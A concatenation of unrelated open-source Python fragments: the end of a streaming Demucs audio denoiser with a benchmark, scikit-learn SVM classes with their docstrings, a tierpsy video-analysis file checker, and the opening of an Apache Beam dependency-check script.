out = downsample2(padded_out)
else:
out = padded_out
out = out[:, resample_buffer // resample:]
out = out[:, :stride]
if demucs.normalize:
out *= math.sqrt(self.variance)
out = self.dry * dry_signal + (1 - self.dry) * out
outs.append(out)
self.pending = self.pending[:, stride:]
self.total_time += time.time() - begin
if outs:
out = th.cat(outs, 1)
else:
out = th.zeros(chin, 0, device=wav.device)
return out
def _separate_frame(self, frame):
demucs = self.demucs
skips = []
next_state = []
first = self.conv_state is None
stride = self.stride * demucs.resample
x = frame[None]
for idx, encode in enumerate(demucs.encoder):
stride //= demucs.stride
length = x.shape[2]
if idx == demucs.depth - 1:
# This is sligthly faster for the last conv
x = fast_conv(encode[0], x)
x = encode[1](x)
x = fast_conv(encode[2], x)
x = encode[3](x)
else:
if not first:
prev = self.conv_state.pop(0)
prev = prev[..., stride:]
tgt = (length - demucs.kernel_size) // demucs.stride + 1
missing = tgt - prev.shape[-1]
offset = length - demucs.kernel_size - \
demucs.stride * (missing - 1)
x = x[..., offset:]
x = encode[1](encode[0](x))
x = fast_conv(encode[2], x)
x = encode[3](x)
if not first:
x = th.cat([prev, x], -1)
next_state.append(x)
skips.append(x)
x = x.permute(2, 0, 1)
x, self.lstm_state = demucs.lstm(x, self.lstm_state)
x = x.permute(1, 2, 0)
# In the following, x contains only correct samples, i.e. the one
# for which each time position is covered by two window of the upper
# layer. extra contains extra samples to the right, and is used only as
# a better padding for the online resampling.
extra = None
for idx, decode in enumerate(demucs.decoder):
skip = skips.pop(-1)
x += skip[..., :x.shape[-1]]
x = fast_conv(decode[0], x)
x = decode[1](x)
if extra is not None:
skip = skip[..., x.shape[-1]:]
extra += skip[..., :extra.shape[-1]]
extra = decode[2](decode[1](decode[0](extra)))
x = decode[2](x)
next_state.append(
x[..., -demucs.stride:] - decode[2].bias.view(-1, 1)
)
if extra is None:
extra = x[..., -demucs.stride:]
else:
extra[..., :demucs.stride] += next_state[-1]
x = x[..., :-demucs.stride]
if not first:
prev = self.conv_state.pop(0)
x[..., :demucs.stride] += prev
if idx != demucs.depth - 1:
x = decode[3](x)
extra = decode[3](extra)
self.conv_state = next_state
return x[0], extra[0]
def test():
import argparse
parser = argparse.ArgumentParser(
"denoiser.demucs",
description="Benchmark the streaming Demucs implementation, as well as "
"checking the delta with the offline implementation.")
parser.add_argument("--depth", default=5, type=int)
parser.add_argument("--resample", default=4, type=int)
parser.add_argument("--hidden", default=48, type=int)
parser.add_argument("--sample_rate", default=16000, type=float)
parser.add_argument("--device", default="cpu")
parser.add_argument("-t", "--num_threads", type=int)
parser.add_argument("-f", "--num_frames", type=int, default=1)
args = parser.parse_args()
if args.num_threads:
th.set_num_threads(args.num_threads)
sr = args.sample_rate
sr_ms = sr / 1000
demucs = Demucs(
depth=args.depth, hidden=args.hidden, resample=args.resample
).to(args.device)
x = th.randn(1, int(sr * 4)).to(args.device)
out = demucs(x[None])[0]
streamer = DemucsStreamer(demucs, num_frames=args.num_frames)
out_rt = []
frame_size = streamer.total_length
with th.no_grad():
while x.shape[1] > 0:
out_rt.append(streamer.feed(x[:, :frame_size]))
x = x[:, frame_size:]
frame_size = streamer.demucs.total_stride
out_rt.append(streamer.flush())
out_rt = th.cat(out_rt, 1)
model_size = sum(p.numel() for p in demucs.parameters()) * 4 / 2**20
initial_lag = streamer.total_length / sr_ms
tpf = 1000 * streamer.time_per_frame
print(f"model size: {model_size:.1f}MB, ", end='')
print(f"delta batch/streaming: {th.norm(out - out_rt) / th.norm(out):.2%}")
print(f"initial lag: {initial_lag:.1f}ms, ", end='')
print(f"stride: {streamer.stride * args.num_frames / sr_ms:.1f}ms")
print(f"time per frame: {tpf:.1f}ms, ", end='')
rtf = (1000 * streamer.time_per_frame) / (streamer.stride / sr_ms)
print(f"RTF: {rtf:.2f}")
print(f"Total lag with computation: {initial_lag + tpf:.1f}ms")
if __name__ == "__main__":
test()
| |
from .base import BaseLibLinear, BaseSVC, BaseLibSVM
from ..base import RegressorMixin
from ..linear_model.base import LinearClassifierMixin
from ..feature_selection.selector_mixin import SelectorMixin
class LinearSVC(BaseLibLinear, LinearClassifierMixin, SelectorMixin):
"""Linear Support Vector Classification.
Similar to SVC with parameter kernel='linear', but implemented in terms of
liblinear rather than libsvm, so it has more flexibility in the choice of
penalties and loss functions and should scale better (to large numbers of
samples).
This class supports both dense and sparse input and the multiclass support
is handled according to a one-vs-the-rest scheme.
Parameters
----------
C : float, optional (default=1.0)
Penalty parameter C of the error term.
loss : string, 'l1' or 'l2' (default='l2')
Specifies the loss function. 'l1' is the hinge loss (standard SVM)
while 'l2' is the squared hinge loss.
penalty : string, 'l1' or 'l2' (default='l2')
Specifies the norm used in the penalization. The 'l2'
penalty is the standard used in SVC. The 'l1' leads to `coef_`
vectors that are sparse.
dual : bool, (default=True)
Select the algorithm to either solve the dual or primal
optimization problem. Prefer dual=False when n_samples > n_features.
tol : float, optional (default=1e-4)
Tolerance for stopping criteria
multi_class: string, 'ovr' or 'crammer_singer' (default='ovr')
Determines the multi-class strategy if `y` contains more than
two classes.
`ovr` trains n_classes one-vs-rest classifiers, while `crammer_singer`
optimizes a joint objective over all classes.
While `crammer_singer` is interesting from an theoretical perspective
as it is consistent it is seldom used in practice and rarely leads to
better accuracy and is more expensive to compute.
If `crammer_singer` is choosen, the options loss, penalty and dual will
be ignored.
fit_intercept : boolean, optional (default=True)
Whether to calculate the intercept for this model. If set
to false, no intercept will be used in calculations
(e.g. data is expected to be already centered).
intercept_scaling : float, optional (default=1)
when self.fit_intercept is True, instance vector x becomes
[x, self.intercept_scaling],
i.e. a "synthetic" feature with constant value equals to
intercept_scaling is appended to the instance vector.
The intercept becomes intercept_scaling * synthetic feature weight
Note! the synthetic feature weight is subject to l1/l2 regularization
as all other features.
To lessen the effect of regularization on synthetic feature weight
(and therefore on the intercept) intercept_scaling has to be increased
class_weight : {dict, 'auto'}, optional
Set the parameter C of class i to class_weight[i]*C for
SVC. If not given, all classes are supposed to have
weight one. The 'auto' mode uses the values of y to
automatically adjust weights inversely proportional to
class frequencies.
verbose : int, default: 0
Enable verbose output. Note that this setting takes advantage of a
per-process runtime setting in liblinear that, if enabled, may not work
properly in a multithreaded context.
Attributes
----------
`coef_` : array, shape = [n_features] if n_classes == 2 \
else [n_classes, n_features]
Weights asigned to the features (coefficients in the primal
problem). This is only available in the case of linear kernel.
`coef_` is readonly property derived from `raw_coef_` that \
follows the internal memory layout of liblinear.
`intercept_` : array, shape = [1] if n_classes == 2 else [n_classes]
Constants in decision function.
Notes
-----
The underlying C implementation uses a random number generator to
select features when fitting the model. It is thus not uncommon,
to have slightly different results for the same input data. If
that happens, try with a smaller tol parameter.
The underlying implementation (liblinear) uses a sparse internal
representation for the data that will incur a memory copy.
**References:**
`LIBLINEAR: A Library for Large Linear Classification
<http://www.csie.ntu.edu.tw/~cjlin/liblinear/>`__
See also
--------
SVC
Implementation of Support Vector Machine classifier using libsvm:
the kernel can be non-linear but its SMO algorithm does not
scale to large number of samples as LinearSVC does.
Furthermore SVC multi-class mode is implemented using one
vs one scheme while LinearSVC uses one vs the rest. It is
possible to implement one vs the rest with SVC by using the
:class:`sklearn.multiclass.OneVsRestClassifier` wrapper.
Finally SVC can fit dense data without memory copy if the input
is C-contiguous. Sparse data will still incur memory copy though.
sklearn.linear_model.SGDClassifier
SGDClassifier can optimize the same cost function as LinearSVC
by adjusting the penalty and loss parameters. Furthermore
SGDClassifier is scalable to large number of samples as it uses
a Stochastic Gradient Descent optimizer.
Finally SGDClassifier can fit both dense and sparse data without
memory copy if the input is C-contiguous or CSR.
"""
# all the implementation is provided by the mixins
pass
class SVC(BaseSVC):
"""C-Support Vector Classification.
The implementations is a based on libsvm. The fit time complexity
is more than quadratic with the number of samples which makes it hard
to scale to dataset with more than a couple of 10000 samples.
The multiclass support is handled according to a one-vs-one scheme.
For details on the precise mathematical formulation of the provided
kernel functions and how `gamma`, `coef0` and `degree` affect each,
see the corresponding section in the narrative documentation:
:ref:`svm_kernels`.
.. The narrative documentation is available at http://scikit-learn.org/
Parameters
----------
C : float, optional (default=1.0)
Penalty parameter C of the error term.
kernel : string, optional (default='rbf')
Specifies the kernel type to be used in the algorithm.
It must be one of 'linear', 'poly', 'rbf', 'sigmoid', 'precomputed' or
a callable.
If none is given, 'rbf' will be used. If a callable is given it is
used to precompute the kernel matrix.
degree : int, optional (default=3)
Degree of kernel function.
It is significant only in 'poly' and 'sigmoid'.
gamma : float, optional (default=0.0)
Kernel coefficient for 'rbf' and 'poly'.
If gamma is 0.0 then 1/n_features will be used instead.
coef0 : float, optional (default=0.0)
Independent term in kernel function.
It is only significant in 'poly' and 'sigmoid'.
probability: boolean, optional (default=False)
Whether to enable probability estimates. This must be enabled prior
to calling predict_proba.
shrinking: boolean, optional (default=True)
Whether to use the shrinking heuristic.
tol : float, optional (default=1e-3)
Tolerance for stopping criterion.
cache_size : float, optional
Specify the size of the kernel cache (in MB)
class_weight : {dict, 'auto'}, optional
Set the parameter C of class i to class_weight[i]*C for
SVC. If not given, all classes are supposed to have
weight one. The 'auto' mode uses the values of y to
automatically adjust weights inversely proportional to
class frequencies.
verbose : bool, default: False
Enable verbose output. Note that this setting takes advantage of a
per-process runtime setting in libsvm that, if enabled, may not work
properly in a multithreaded context.
max_iter : int, optional (default=-1)
Hard limit on iterations within solver, or -1 for no limit.
Attributes
----------
`support_` : array-like, shape = [n_SV]
Index of support vectors.
`support_vectors_` : array-like, shape = [n_SV, n_features]
Support vectors.
`n_support_` : array-like, dtype=int32, shape = [n_class]
number of support vector for each class.
`dual_coef_` : array, shape = [n_class-1, n_SV]
Coefficients of the support vector in the decision function. \
For multiclass, coefficient for all 1-vs-1 classifiers. \
The layout of the coefficients in the multiclass case is somewhat \
non-trivial. See the section about multi-class classification in the \
SVM section of the User Guide for details.
`coef_` : array, shape = [n_class-1, n_features]
Weights asigned to the features (coefficients in the primal
problem). This is only available in the case of linear kernel.
`coef_` is readonly property derived from `dual_coef_` and
`support_vectors_`
`intercept_` : array, shape = [n_class * (n_class-1) / 2]
Constants in decision function.
Examples
--------
>>> import numpy as np
>>> X = np.array([[-1, -1], [-2, -1], [1, 1], [2, 1]])
>>> y = np.array([1, 1, 2, 2])
>>> from sklearn.svm import SVC
>>> clf = SVC()
>>> clf.fit(X, y) #doctest: +NORMALIZE_WHITESPACE
SVC(C=1.0, cache_size=200, class_weight=None, coef0=0.0, degree=3,
gamma=0.0, kernel='rbf', max_iter=-1, probability=False,
shrinking=True, tol=0.001, verbose=False)
>>> print(clf.predict([[-0.8, -1]]))
[ 1.]
See also
--------
SVR
Support Vector Machine for Regression implemented using libsvm.
LinearSVC
Scalable Linear Support Vector Machine for classififcation
implemented using liblinear. Check the See also section of
LinearSVC for more comparison element.
"""
def __init__(self, C=1.0, kernel='rbf', degree=3, gamma=0.0,
coef0=0.0, shrinking=True, probability=False,
tol=1e-3, cache_size=200, class_weight=None,
verbose=False, max_iter=-1):
super(SVC, self).__init__(
'c_svc', kernel, degree, gamma, coef0, tol, C, 0., 0., shrinking,
probability, cache_size, "auto", class_weight, verbose, max_iter)
class NuSVC(BaseSVC):
"""Nu-Support Vector Classification.
Similar to SVC but uses a parameter to control the number of support
vectors.
The implementation is based on libsvm.
Parameters
----------
nu : float, optional (default=0.5)
An upper bound on the fraction of training errors and a lower
bound of the fraction of support vectors. Should be in the
interval (0, 1].
kernel : string, optional (default='rbf')
Specifies the kernel type to be used in the algorithm.
It must be one of 'linear', 'poly', 'rbf', 'sigmoid', 'precomputed' or
a callable.
If none is given, 'rbf' will be used. If a callable is given it is
used to precompute the kernel matrix.
degree : int, optional (default=3)
degree of kernel function
is significant only in poly, rbf, sigmoid
gamma : float, optional (default=0.0)
kernel coefficient for rbf and poly, if gamma is 0.0 then 1/n_features
will be taken.
coef0 : float, optional (default=0.0)
independent term in kernel function. It is only significant
in poly/sigmoid.
probability: boolean, optional (default=False)
Whether to enable probability estimates. This must be enabled prior
to calling predict_proba.
shrinking: boolean, optional (default=True)
Whether to use the shrinking heuristic.
tol : float, optional (default=1e-3)
Tolerance for stopping criterion.
cache_size : float, optional
Specify the size of the kernel cache (in MB)
class_weight : {dict, 'auto'}, optional
Set the parameter C of class i to class_weight[i]*C for
SVC. If not given, all classes are supposed to have
weight one. The 'auto' mode uses the values of y to
automatically adjust weights inversely proportional to
class frequencies.
verbose : bool, default: False
Enable verbose output. Note that this setting takes advantage of a
per-process runtime setting in libsvm that, if enabled, may not work
properly in a multithreaded context.
max_iter : int, optional (default=-1)
Hard limit on iterations within solver, or -1 for no limit.
Attributes
----------
`support_` : array-like, shape = [n_SV]
Index of support vectors.
`support_vectors_` : array-like, shape = [n_SV, n_features]
Support vectors.
`n_support_` : array-like, dtype=int32, shape = [n_class]
number of support vector for each class.
`dual_coef_` : array, shape = [n_class-1, n_SV]
Coefficients of the support vector in the decision function. \
For multiclass, coefficient for all 1-vs-1 classifiers. \
The layout of the coefficients in the multiclass case is somewhat \
non-trivial. See the section about multi-class classification in \
the SVM section of the User Guide for details.
`coef_` : array, shape = [n_class-1, n_features]
Weights asigned to the features (coefficients in the primal
problem). This is only available in the case of linear kernel.
`coef_` is readonly property derived from `dual_coef_` and
`support_vectors_`
`intercept_` : array, shape = [n_class * (n_class-1) / 2]
Constants in decision function.
Examples
--------
>>> import numpy as np
>>> X = np.array([[-1, -1], [-2, -1], [1, 1], [2, 1]])
>>> y = np.array([1, 1, 2, 2])
>>> from sklearn.svm import NuSVC
>>> clf = NuSVC()
>>> clf.fit(X, y) #doctest: +NORMALIZE_WHITESPACE
NuSVC(cache_size=200, coef0=0.0, degree=3, gamma=0.0, kernel='rbf',
max_iter=-1, nu=0.5, probability=False, shrinking=True, tol=0.001,
verbose=False)
>>> print(clf.predict([[-0.8, -1]]))
[ 1.]
See also
--------
SVC
Support Vector Machine for classification using libsvm.
LinearSVC
Scalable linear Support Vector Machine for classification using
liblinear.
"""
def __init__(self, nu=0.5, kernel='rbf', degree=3, gamma=0.0,
coef0=0.0, shrinking=True, probability=False,
tol=1e-3, cache_size=200, verbose=False, max_iter=-1):
super(NuSVC, self).__init__(
'nu_svc', kernel, degree, gamma, coef0, tol, 0., nu, 0., shrinking,
probability, cache_size, "auto", None, verbose, max_iter)
class SVR(BaseLibSVM, RegressorMixin):
"""epsilon-Support Vector Regression.
The free parameters in the model are C and epsilon.
The implementations is a based on libsvm.
Parameters
----------
C : float, optional (default=1.0)
penalty parameter C of the error term.
epsilon : float, optional (default=0.1)
epsilon in the epsilon-SVR model. It specifies the epsilon-tube
within which no penalty is associated in the training loss function
with points predicted within a distance epsilon from the actual
value.
kernel : string, optional (default='rbf')
Specifies the kernel type to be used in the algorithm.
It must be one of 'linear', 'poly', 'rbf', 'sigmoid', 'precomputed' or
a callable.
If none is given, 'rbf' will be used. If a callable is given it is
used to precompute the kernel matrix.
degree : int, optional (default=3)
degree of kernel function
is significant only in poly, rbf, sigmoid
gamma : float, optional (default=0.0)
kernel coefficient for rbf and poly, if gamma is 0.0 then 1/n_features
will be taken.
coef0 : float, optional (default=0.0)
independent term in kernel function. It is only significant
in poly/sigmoid.
probability: boolean, optional (default=False)
Whether to enable probability estimates. This must be enabled prior
to calling predict_proba.
shrinking: boolean, optional (default=True)
Whether to use the shrinking heuristic.
tol : float, optional (default=1e-3)
Tolerance for stopping criterion.
cache_size : float, optional
Specify the size of the kernel cache (in MB)
verbose : bool, default: False
Enable verbose output. Note that this setting takes advantage of a
per-process runtime setting in libsvm that, if enabled, may not work
properly in a multithreaded context.
max_iter : int, optional (default=-1)
Hard limit on iterations within solver, or -1 for no limit.
Attributes
----------
`support_` : array-like, shape = [n_SV]
Index of support vectors.
`support_vectors_` : array-like, shape = [nSV, n_features]
Support vectors.
`dual_coef_` : array, shape = [n_classes-1, n_SV]
Coefficients of the support vector in the decision function.
`coef_` : array, shape = [n_classes-1, n_features]
Weights asigned to the features (coefficients in the primal
problem). This is only available in the case of linear kernel.
`coef_` is readonly property derived from `dual_coef_` and
`support_vectors_`
`intercept_` : array, shape = [n_class * (n_class-1) / 2]
Constants in decision function.
Examples
--------
>>> from sklearn.svm import SVR
>>> import numpy as np
>>> n_samples, n_features = 10, 5
>>> np.random.seed(0)
>>> y = np.random.randn(n_samples)
>>> X = np.random.randn(n_samples, n_features)
>>> clf = SVR(C=1.0, epsilon=0.2)
>>> clf.fit(X, y) #doctest: +NORMALIZE_WHITESPACE
SVR(C=1.0, cache_size=200, coef0=0.0, degree=3, epsilon=0.2, gamma=0.0,
kernel='rbf', max_iter=-1, probability=False, shrinking=True, tol=0.001,
verbose=False)
See also
--------
NuSVR
Support Vector Machine for regression implemented using libsvm
using a parameter to control the number of support vectors.
"""
def __init__(self, kernel='rbf', degree=3, gamma=0.0, coef0=0.0, tol=1e-3,
C=1.0, epsilon=0.1, shrinking=True, probability=False,
cache_size=200, verbose=False, max_iter=-1):
super(SVR, self).__init__(
'epsilon_svr', kernel, degree, gamma, coef0, tol, C, 0., epsilon,
shrinking, probability, cache_size, "auto", None, verbose,
max_iter)
class NuSVR(BaseLibSVM, RegressorMixin):
"""Nu Support Vector Regression.
Similar to NuSVC, for regression, uses a parameter nu to control
the number of support vectors. However, unlike NuSVC, where nu
replaces C, here nu replaces with the parameter epsilon of SVR.
The implementations is a based on libsvm.
Parameters
----------
C : float, optional (default=1.0)
penalty parameter C of the error term.
nu : float, optional
An upper bound on the fraction of training errors and a lower bound of
the fraction of support vectors. Should be in the interval (0, 1]. By
default 0.5 will be taken. Only available if impl='nu_svc'.
kernel : string, optional (default='rbf')
Specifies the kernel type to be used in the algorithm.
It must be one of 'linear', 'poly', 'rbf', 'sigmoid', 'precomputed' or
a callable.
If none is given, 'rbf' will be used. If a callable is given it is
used to precompute the kernel matrix.
degree : int, optional (default=3)
degree of kernel function
is significant only in poly, rbf, sigmoid
gamma : float, optional (default=0.0)
kernel coefficient for rbf and poly, if gamma is 0.0 then 1/n_features
will be taken.
coef0 : float, optional (default=0.0)
independent term in kernel function. It is only significant
in poly/sigmoid.
probability: boolean, optional (default=False)
Whether to enable probability estimates. This must be enabled prior
to calling predict_proba.
shrinking: boolean, optional (default=True)
Whether to use the shrinking heuristic.
tol : float, optional (default=1e-3)
Tolerance for stopping criterion.
cache_size : float, optional
Specify the size of the kernel cache (in MB)
verbose : bool, default: False
Enable verbose output. Note that this setting takes advantage of a
per-process runtime setting in libsvm that, if enabled, may not work
properly in a multithreaded context.
max_iter : int, optional (default=-1)
Hard limit on iterations within solver, or -1 for no limit.
Attributes
----------
`support_` : array-like, shape = [n_SV]
Index of support vectors.
`support_vectors_` : array-like, shape = [nSV, n_features]
Support vectors.
`dual_coef_` : array, shape = [n_classes-1, n_SV]
Coefficients of the support vector in the decision function.
`coef_` : array, shape = [n_classes-1, n_features]
Weights asigned to the features (coefficients in the primal
problem). This is only available in the case of linear kernel.
`coef_` is readonly property derived from `dual_coef_` and
`support_vectors_`
`intercept_` : array, shape = [n_class * (n_class-1) / 2]
Constants in decision function.
Examples
--------
>>> from sklearn.svm import NuSVR
>>> import numpy as np
>>> n_samples, n_features = 10, 5
>>> np.random.seed(0)
>>> y = np.random.randn(n_samples)
>>> X = np.random.randn(n_samples, n_features)
>>> clf = NuSVR(C=1.0, nu=0.1)
>>> clf.fit(X, y) #doctest: +NORMALIZE_WHITESPACE
NuSVR(C=1.0, cache_size=200, coef0=0.0, degree=3, gamma=0.0, kernel='rbf',
max_iter=-1, nu=0.1, probability=False, shrinking=True, tol=0.001,
verbose=False)
See also
--------
NuSVC
Support Vector Machine for classification implemented with libsvm
with a parameter to control the number of support vectors.
SVR
epsilon Support Vector Machine for regression implemented with libsvm.
"""
def __init__(self, nu=0.5, C=1.0, kernel='rbf', degree=3,
gamma=0.0, coef0=0.0, shrinking=True,
probability=False, tol=1e-3, cache_size=200,
verbose=False, max_iter=-1):
super(NuSVR, self).__init__(
'nu_svr', kernel, degree, gamma, coef0, tol, C, nu, 0., shrinking,
probability, cache_size, "auto", None, verbose, max_iter)
class OneClassSVM(BaseLibSVM):
"""Unsupervised Outliers Detection.
Estimate the support of a high-dimensional distribution.
The implementation is based on libsvm.
Parameters
----------
kernel : string, optional (default='rbf')
Specifies the kernel type to be used in the algorithm.
It must be one of 'linear', 'poly', 'rbf', 'sigmoid', 'precomputed' or
a callable.
If none is given, 'rbf' will be used. If a callable is given it is
used to precompute the kernel matrix.
nu : float, optional
An upper bound on the fraction of training
errors and a lower bound of the fraction of support
vectors. Should be in the interval (0, 1]. By default 0.5
will be taken.
degree : int, optional
Degree of kernel function. Significant only in poly, rbf, sigmoid.
gamma : float, optional (default=0.0)
kernel coefficient for rbf and poly, if gamma is 0.0 then 1/n_features
will be taken.
coef0 : float, optional
Independent term in kernel function. It is only significant in
poly/sigmoid.
tol : float, optional
Tolerance for stopping criterion.
shrinking: boolean, optional
Whether to use the shrinking heuristic.
cache_size : float, optional
Specify the size of the kernel cache (in MB)
verbose : bool, default: False
Enable verbose output. Note that this setting takes advantage of a
per-process runtime setting in libsvm that, if enabled, may not work
properly in a multithreaded context.
max_iter : int, optional (default=-1)
Hard limit on iterations within solver, or -1 for no limit.
Attributes
----------
`support_` : array-like, shape = [n_SV]
Index of support vectors.
`support_vectors_` : array-like, shape = [nSV, n_features]
Support vectors.
`dual_coef_` : array, shape = [n_classes-1, n_SV]
Coefficient of the support vector in the decision function.
`coef_` : array, shape = [n_classes-1, n_features]
Weights asigned to the features (coefficients in the primal
problem). This is only available in the case of linear kernel.
`coef_` is readonly property derived from `dual_coef_` and
`support_vectors_`
`intercept_` : array, shape = [n_classes-1]
Constants in decision function.
"""
def __init__(self, kernel='rbf', degree=3, gamma=0.0, coef0=0.0, tol=1e-3,
nu=0.5, shrinking=True, cache_size=200, verbose=False,
max_iter=-1):
super(OneClassSVM, self).__init__(
'one_class', kernel, degree, gamma, coef0, tol, 0., nu, 0.,
shrinking, False, cache_size, "auto", None, verbose, max_iter)
def fit(self, X, sample_weight=None, **params):
"""
Detects the soft boundary of the set of samples X.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Set of samples, where n_samples is the number of samples and
n_features is the number of features.
Returns
-------
self : object
Returns self.
Notes
-----
If X is not a C-ordered contiguous array it is copied.
"""
super(OneClassSVM, self).fit(X, [], sample_weight=sample_weight,
**params)
return self
| |
# -*- coding: utf-8 -*-
"""
Created on Tue Jun 9 15:12:48 2015
@author: ajaver
"""
import multiprocessing as mp
import os
from functools import partial
from tierpsy.helper.misc import TimeCounter
from tierpsy.processing.AnalysisPoints import AnalysisPoints, init_analysis_point_lock
from tierpsy.processing.ProcessLocal import BATCH_SCRIPT_LOCAL
from tierpsy.processing.helper import create_script
from tierpsy.processing.run_multi_cmd import print_cmd_list
BREAK_L = '*********************************************'
class CheckFilesForProcessing(object):
def __init__(self, video_dir_root, mask_dir_root,
results_dir_root, tmp_dir_root='',
json_file='', analysis_checkpoints = [],
is_copy_video = True,
copy_unfinished=True,
is_parallel_check=True):
def _testFileExists(fname, type_str):
if fname:
fname = os.path.abspath(fname)
if not os.path.exists(fname):
raise FileNotFoundError('%s does not exist.' % fname)
return fname
def _makeDirIfNotExists(fname):
if fname:
fname = os.path.abspath(fname)
if not os.path.exists(fname):
os.makedirs(fname)
return fname
# checkings before accepting the data
self.video_dir_root = _testFileExists(video_dir_root, 'Videos root directory')
self.mask_dir_root = _makeDirIfNotExists(mask_dir_root)
self.results_dir_root = _makeDirIfNotExists(results_dir_root)
self.json_file = _testFileExists(json_file, 'Parameters json file')
self.tmp_dir_root = _makeDirIfNotExists(tmp_dir_root)
self.is_copy_video = is_copy_video
self.copy_unfinished = copy_unfinished
self.analysis_checkpoints = analysis_checkpoints
self.filtered_files = {}
self.is_parallel_check = is_parallel_check
def _checkIndFile(self, video_file):
'''Check the progress in the file.'''
video_dir, video_file_name = os.path.split(video_file)
subdir_path = self._getSubDirPath(video_dir, self.video_dir_root)
mask_dir = os.path.join(self.mask_dir_root, subdir_path)
results_dir = os.path.join(self.results_dir_root, subdir_path)
ap_obj = AnalysisPoints(video_file, mask_dir, results_dir, self.json_file)
unfinished_points = ap_obj.getUnfinishedPoints(self.analysis_checkpoints)
if len(unfinished_points) == 0:
msg = 'FINISHED_GOOD'
else:
unmet_requirements = ap_obj.hasRequirements(unfinished_points[0])
if len(unmet_requirements) > 0:
msg ='SOURCE_BAD'
#print(self.analysis_checkpoints[0], unmet_requirements)
#print(ap_obj.file_names['masked_image'])
elif unfinished_points != self.analysis_checkpoints:
msg = 'FINISHED_BAD'
else:
msg = 'SOURCE_GOOD'
return msg, ap_obj, unfinished_points
def _getSubDirPath(self, source_dir, source_root_dir):
'''Generate the destination dir path keeping the same structure
as the source directory'''
#if the source_root_dir is empty do not create a subdir_path
if not source_root_dir:
return ''
subdir_path = source_dir.replace(source_root_dir, '')
#TODO: What happends is there is MaskedVideos within the subdirectory
# consider the case the subdirectory is only a directory separation
# character
if subdir_path and subdir_path[0] == os.sep:
subdir_path = subdir_path[1:] if len(subdir_path) > 1 else ''
return subdir_path
@property
def summary_msg(self):
msg_pairs = [
('SOURCE_GOOD', 'Unprocessed files.'),
('FINISHED_BAD', 'Files whose analysis is incompleted.'),
('SOURCE_BAD', 'Invalid source files.'),
('FINISHED_GOOD', 'Files that were succesfully finished.')
]
def _vals2str(val, msg):
return '{}\t{}'.format(val, msg)
msd_dat = [ _vals2str(len(self.filtered_files[key]), msg) for key, msg in msg_pairs]
tot_proc_files = len(self.filtered_files['SOURCE_GOOD']) + len(self.filtered_files['FINISHED_BAD'])
s_msg = [BREAK_L]
s_msg += ['Analysis Summary']
s_msg += [BREAK_L]
s_msg += msd_dat
s_msg += [BREAK_L]
s_msg += [_vals2str(tot_proc_files, 'Total files to be processed.')]
s_msg += [BREAK_L]
s_msg = '\n'.join(s_msg)
return s_msg
def filterFiles(self, valid_files, print_cmd=False):
# for ii, video_file in enumerate(valid_files):
# label, ap_obj, unfinished_points = self._checkIndFile(video_file)
# self.filtered_files[label].append((ap_obj, unfinished_points))
# if (ii % 10) == 0:
progress_timer = TimeCounter('')
n_batch = mp.cpu_count()
if self.is_parallel_check:
lock = mp.Lock()
p = mp.Pool(n_batch, initializer=init_analysis_point_lock, initargs=(lock,))
all_points = []
tot_files = len(valid_files)
for ii in range(0, tot_files, n_batch):
dat = valid_files[ii:ii + n_batch]
if self.is_parallel_check:
res = list(p.map(self._checkIndFile, dat))
else:
res = list(map(self._checkIndFile, dat))
all_points.append(res)
n_files = len(dat)
print('Checking file {} of {}. Total time: {}'.format(ii + n_files,
tot_files, progress_timer.get_time_str()))
all_points = sum(all_points, []) #flatten
# intialize filtered files lists
filtered_files_fields = (
'SOURCE_GOOD',
'SOURCE_BAD',
'FINISHED_GOOD',
'FINISHED_BAD',
'EMPTY_ANALYSIS_LIST')
self.filtered_files = {key: [] for key in filtered_files_fields}
for label, ap_obj, unfinished_points in all_points:
self.filtered_files[label].append((ap_obj, unfinished_points))
print(BREAK_L)
print('''Finished to check files.\nTotal time elapsed {}'''.format(progress_timer.get_time_str()))
print(BREAK_L + '\n')
cmd_list = self.getCMDlist()
if print_cmd:
#print the commands to be executed
print(BREAK_L)
print('Commands to be executed.')
print(BREAK_L)
print_cmd_list(cmd_list)
print(BREAK_L + '\n')
print(self.summary_msg)
return cmd_list
def _printUnmetReq(self):
def _get_unmet_requirements(input_data):
ap_obj, unfinished_points = input_data
for requirement in ap_obj.unmet_requirements:
if requirement in ap_obj.checkpoints:
fname = ap_obj.checkpoints[requirement]['provenance_file']
else:
requirement = '{} : {}'.format(requirement, ap_obj.file_names['original_video'])
return requirement
#print(self.filtered_files['SOURCE_BAD'])
msg_l = map(_get_unmet_requirements, self.filtered_files['SOURCE_BAD'])
msg ='\n'.join(msg_l)
print(msg)
return msg
def getCMDlist(self):
A = map(self.generateIndCMD, self.filtered_files['SOURCE_GOOD'])
B = map(self.generateIndCMD, self.filtered_files['FINISHED_BAD'])
return list(B) + list(A)
def generateIndCMD(self, input_d):
good_ap_obj, unfinished_points = input_d
subdir_path = self._getSubDirPath(
os.path.dirname(good_ap_obj.video_file),
self.video_dir_root)
if self.tmp_dir_root:
tmp_mask_dir = os.path.join(self.tmp_dir_root, 'MaskedVideos', subdir_path)
tmp_results_dir = os.path.join(self.tmp_dir_root, 'Results', subdir_path)
else:
tmp_mask_dir, tmp_results_dir = '', ''
args = [good_ap_obj.video_file]
argkws = {'masks_dir':good_ap_obj.masks_dir,
'results_dir':good_ap_obj.results_dir,
'tmp_mask_dir':tmp_mask_dir,
'tmp_results_dir':tmp_results_dir,
'json_file':self.json_file,
'analysis_checkpoints': unfinished_points,#self.analysis_checkpoints,
'is_copy_video':self.is_copy_video,
'copy_unfinished':self.copy_unfinished}
cmd = create_script(BATCH_SCRIPT_LOCAL, args, argkws)
return cmd
| |
from __future__ import print_function
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import logging
import os
import traceback
import yaml
import dependency_check.version_comparer as version_comparer
from datetime import datetime
from jira_client import JiraClient
_JIRA_PROJECT_NAME = 'BEAM'
_JIRA_COMPONENT = 'dependencies'
_ISSUE_SUMMARY_PREFIX = 'Beam Dependency Update Request: '
